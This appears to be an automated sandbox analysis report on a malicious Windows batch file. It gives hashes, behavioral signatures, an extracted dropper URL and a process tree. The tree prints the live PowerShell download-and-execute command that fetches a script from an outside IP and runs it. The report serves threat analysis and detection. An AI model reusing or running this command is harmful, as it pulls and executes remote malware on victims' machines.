Analysis
-
max time kernel
145s -
max time network
65s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
05-08-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
f63307d927f76a7440257534e6f8ce90.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
f63307d927f76a7440257534e6f8ce90.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
f63307d927f76a7440257534e6f8ce90.bat
-
Size
220B
-
MD5
5cc2898f29e28db6519da57795c9e09b
-
SHA1
415d75288386a5a534fecc039e479a8092f8cdfe
-
SHA256
87cfbdd18095373e4e2674283270a2f829cb9d025556397ea5738eec62710ed2
-
SHA512
6fc920fda753894ab4ae3c4856d867ee41ea1eb61fdad542fef8c0cd6358008386f6894138ee45775fa11d0581af76172e489faf0aef6fb6bfd30fade4a7a222
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/f63307d927f76a7440257534e6f8ce90
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 584 3952 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 584 WerFault.exe Token: SeBackupPrivilege 584 WerFault.exe Token: SeDebugPrivilege 584 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe 584 WerFault.exe -
ServiceHost packer 5 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/3952-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3952-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3952-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3952-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3952-6-0x0000000000000000-mapping.dmp servicehost -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3956 wrote to memory of 3952 3956 cmd.exe powershell.exe PID 3956 wrote to memory of 3952 3956 cmd.exe powershell.exe PID 3956 wrote to memory of 3952 3956 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f63307d927f76a7440257534e6f8ce90.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f63307d927f76a7440257534e6f8ce90');Invoke-JFFIICTTYZLYL;Start-Sleep -s 10000"2⤵PID:3952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 7003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:584